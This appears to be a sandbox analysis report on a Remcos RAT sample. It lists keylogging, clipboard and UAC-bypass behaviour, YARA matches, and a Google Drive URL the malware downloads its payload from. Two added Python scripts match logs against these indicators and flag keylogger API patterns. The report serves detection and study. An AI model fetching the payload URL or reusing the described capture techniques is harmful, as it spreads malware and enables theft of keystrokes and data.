Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 21_2_02E9C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,21_2_02E9C322
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 21_2_02E896A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,21_2_02E896A0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 21_2_02E99B86 FindFirstFileW,FindNextFileW,FindNextFileW,21_2_02E99B86
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 21_2_02E8BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,21_2_02E8BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 21_2_02ECE8F9 FindFirstFileExA,21_2_02ECE8F9
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 21_2_02E87877 FindFirstFileW,FindNextFileW,21_2_02E87877
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 21_2_02E88847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,21_2_02E88847
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 21_2_02E8BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,21_2_02E8BD72
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 11_2_03207CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_03207CD2

Networking

                Source: Malware configuration extractorURLs: https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CAE4B8 InternetCheckConnectionA,0_2_02CAE4B8
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 142.250.181.129:443
                Source: global trafficHTTP traffic detected: GET /download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03216676 Sleep,URLDownloadToFileW,11_2_03216676
                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                Source: colorcpl.exeString found in binary or memory: http://geoplugin.net/json.gp
                Source: nft438A5fN.exe, 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                Source: Amcache.hve.14.drString found in binary or memory: http://upx.sf.net
                Source: nft438A5fN.exe, nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1670762206.000000007FAB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                Source: nft438A5fN.exe, 00000000.00000002.1655641681.00000000396BD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/dow
                Source: nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi
                Source: nft438A5fN.exe, 00000000.00000002.1611613314.000000000085B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/t
                Source: nft438A5fN.exe, 00000000.00000002.1611613314.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com:443/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdiX?
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownHTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.8:49706 version: TLS 1.2
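The records above give four network indicators that survive re-packing of the loader: the Google Drive URL the configuration extractor recovered, the WinHttpRequest.5 User-Agent on that GET, the JA3 hash Suricata flagged with SID 2028371, and the geoplugin.net string Remcos uses for its geolocation check-in. The following Python is an added example for this page, not code from Joe Sandbox or from the malware; it scores constructed proxy/TLS log lines against those indicators. The log format, the sample lines, the rule names and the severity scheme are my assumptions. It goes one step beyond the single URL in the report: any Drive usercontent download fetched with the WinHttpRequest.5 User-Agent is scored, because that string is what the WinHttpRequest COM object sends from a script and is not a browser User-Agent.

```python
"""Match proxy/TLS log records against the network indicators listed above.

Added example: the indicator values are copied from the report, but the log
format, the sample lines and the scoring are constructed for this illustration.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Indicator values taken from the report.
PAYLOAD_HOST = "drive.usercontent.google.com"
PAYLOAD_PATH = "/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi"
DOWNLOADER_UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
OBSERVED_JA3 = "a0e9f5d64349fb13191bc781f81f42e1"     # Suricata SID 2028371 fires on this
GEOIP_HOST, GEOIP_PATH = "geoplugin.net", "/json.gp"  # Remcos geolocation check-in

# Constructed log format: ts|client_ip|host|path|user_agent|ja3 (ja3 empty for plain HTTP)
LINE_RE = re.compile(
    r"^(?P<ts>[^|]+)\|(?P<client>\d+\.\d+\.\d+\.\d+)\|(?P<host>[^|]+)\|"
    r"(?P<path>[^|]*)\|(?P<ua>[^|]*)\|(?P<ja3>[0-9a-f]{32}|)$"
)


@dataclass
class Hit:
    client: str
    host: str
    reasons: List[str] = field(default_factory=list)

    @property
    def severity(self) -> str:
        high = {"payload_url", "winhttp_script_drive_download"}
        return "high" if high & set(self.reasons) else "medium"


def parse_line(line: str) -> Optional[dict]:
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(rec: dict) -> List[str]:
    """Return the indicator names a parsed record matches, in a fixed order."""
    reasons = []
    if rec["host"] == PAYLOAD_HOST and rec["path"] == PAYLOAD_PATH:
        reasons.append("payload_url")            # the exact URL from the config extractor
    # Generalisation: a Drive usercontent download fetched by the WinHttpRequest COM
    # object rather than a browser. The UA alone is common in admin scripts, so it is
    # only scored together with the host and the download path shape.
    if (rec["host"] == PAYLOAD_HOST and rec["path"].startswith("/download?id=")
            and rec["ua"] == DOWNLOADER_UA):
        reasons.append("winhttp_script_drive_download")
    if rec["ja3"] == OBSERVED_JA3:
        reasons.append("ja3_match")              # JA3 identifies a TLS stack, not a program
    if rec["host"] == GEOIP_HOST and rec["path"] == GEOIP_PATH:
        reasons.append("remcos_geoip_checkin")
    return reasons


def scan(lines) -> List[Hit]:
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                             # malformed line: skip, do not crash
        reasons = classify(rec)
        if reasons:
            hits.append(Hit(rec["client"], rec["host"], reasons))
    return hits


# Constructed sample log (not real traffic from the analysis).
SAMPLE_LOG = """\
2024-11-25T10:00:01Z|192.168.2.8|drive.usercontent.google.com|/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi|Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)|a0e9f5d64349fb13191bc781f81f42e1
2024-11-25T10:00:09Z|192.168.2.8|geoplugin.net|/json.gp|Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)|
2024-11-25T10:01:30Z|192.168.2.9|drive.usercontent.google.com|/download?id=someOtherDocumentId|Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0|cd08e31494f9531f560d64c695473da9
2024-11-25T10:02:00Z|192.168.2.10|drive.usercontent.google.com|/download?id=someOtherDocumentId|Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)|
this line is not in the expected format
"""

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG.splitlines()):
        print(h.severity, h.client, h.host, ",".join(h.reasons))
```

Running the block prints one line per hit: the sandbox client scores high on three indicators at once, its geoplugin.net request scores medium, the browser download of an unrelated document is ignored, and the third host scores high on the generalised rule alone. The JA3 hash is kept at medium on purpose: the Suricata rule itself says "Possible Malware", and a JA3 value describes the TLS client stack rather than the program driving it, so it should corroborate the host and User-Agent rather than stand alone.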

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320A2F3 SetWindowsHookExA 0000000D,0320A2DF,0000000011_2_0320A2F3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320B749 OpenClipboard,GetClipboardData,CloseClipboard,11_2_0320B749
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_032168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,11_2_032168FC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E968FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,21_2_02E968FC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,11_2_0320A41B
                Source: Yara matchFile source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR
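The five code-function records above are enough to reconstruct the keylogger: a hook of type 0000000D (13, WH_KEYBOARD_LL) installed with SetWindowsHookExA, a translation routine that reads the keyboard state and calls ToUnicodeEx to turn virtual-key codes into characters (after GetForegroundWindow, so the log can be tagged with the window that received the keys), and clipboard reads in both colorcpl.exe instances. The following Python is an added example, not code from Joe Sandbox or from the malware; it parses the report's "Code function" lines in the layout they have on this page and tags each process index with the capture behaviours found. The record regex, the rule names and the aggregation are my assumptions; the hook-id table is from winuser.h.

```python
"""Parse Joe Sandbox 'Code function' records and flag the input-capture patterns
listed above (low-level keyboard hook, keystroke translation, clipboard reads).

Added example: the record lines are copied from the report; the parser, the rule
names and the per-process aggregation are mine and assume the report's text layout.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

# Hook ids for SetWindowsHookEx (winuser.h); the report's 0000000D is WH_KEYBOARD_LL.
HOOK_IDS = {2: "WH_KEYBOARD", 7: "WH_MOUSE", 13: "WH_KEYBOARD_LL", 14: "WH_MOUSE_LL"}

# Layout as rendered on this page: "Source: <image>Code function: <fid> <apis/args><fid>"
RECORD_RE = re.compile(
    r"^\s*Source:\s*(?P<image>.+?)Code function:\s*(?P<fid>\d+_\d+_[0-9A-Fa-f]+)\s+"
    r"(?P<body>.*?)\s*(?P=fid)\s*$"
)
ARG_RE = re.compile(r"^[0-9A-Fa-f]{8}$")   # 8 hex digits: a call argument, not an API name


def parse_record(line: str) -> Optional[dict]:
    """Return {image, proc, fid, calls:[(api, [args])]} or None for a non-record line."""
    m = RECORD_RE.match(line)
    if not m:
        return None
    calls: List[Tuple[str, List[str]]] = []
    for tok in re.split(r"[,\s]+", m.group("body")):
        if not tok:
            continue
        if ARG_RE.match(tok) and calls:
            calls[-1][1].append(tok)           # argument belongs to the preceding API
        else:
            calls.append((tok, []))
    return {"image": m.group("image"), "proc": int(m.group("fid").split("_")[0]),
            "fid": m.group("fid"), "calls": calls}


def match_rules(rec: dict) -> Set[str]:
    apis = {api for api, _ in rec["calls"]}
    found: Set[str] = set()
    for api, args in rec["calls"]:
        if api in ("SetWindowsHookExA", "SetWindowsHookExW") and args:
            hook = HOOK_IDS.get(int(args[0], 16))
            if hook in ("WH_KEYBOARD", "WH_KEYBOARD_LL"):
                found.add(f"keyboard_hook:{hook}")
    if {"GetKeyboardState", "ToUnicodeEx"} <= apis:
        found.add("keystroke_translation")     # raw VK codes turned into typed characters
        if "GetForegroundWindow" in apis:
            found.add("active_window_tagging") # records which window received the keys
    if {"OpenClipboard", "GetClipboardData"} <= apis:
        found.add("clipboard_read")
    return found


def triage(lines) -> Dict[int, Set[str]]:
    """Aggregate rule hits per process index (first field of the function id)."""
    per_proc: Dict[int, Set[str]] = defaultdict(set)
    for line in lines:
        rec = parse_record(line)
        if rec:
            per_proc[rec["proc"]] |= match_rules(rec)
    return {p: s for p, s in per_proc.items() if s}


# Records copied from the report; the last one is a benign file-enumeration control.
SAMPLE_RECORDS = r"""
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320A2F3 SetWindowsHookExA 0000000D,0320A2DF,0000000011_2_0320A2F3
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320B749 OpenClipboard,GetClipboardData,CloseClipboard,11_2_0320B749
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E968FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,21_2_02E968FC
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,11_2_0320A41B
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E87877 FindFirstFileW,FindNextFileW,21_2_02E87877
""".strip().splitlines()

if __name__ == "__main__":
    for proc, tags in sorted(triage(SAMPLE_RECORDS).items()):
        print(proc, sorted(tags))
```

Process index 11 (the first colorcpl.exe) collects all four tags, while index 21 only reads the clipboard, which matches the two instances the report lists. A WH_KEYBOARD_LL hook by itself is a weak signal, since input-method editors and accessibility tools install the same hook; the combination with GetKeyboardState/ToUnicodeEx and foreground-window lookups in the same binary is what makes it a keylogger.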

                E-Banking Fraud

                Source: Yara matchFile source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

                Spam, unwanted Advertisements and Ransom Demands

                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0321CA73 SystemParametersInfoW,11_2_0321CA73
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E9CA73 SystemParametersInfoW,21_2_02E9CA73

                System Summary

                Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
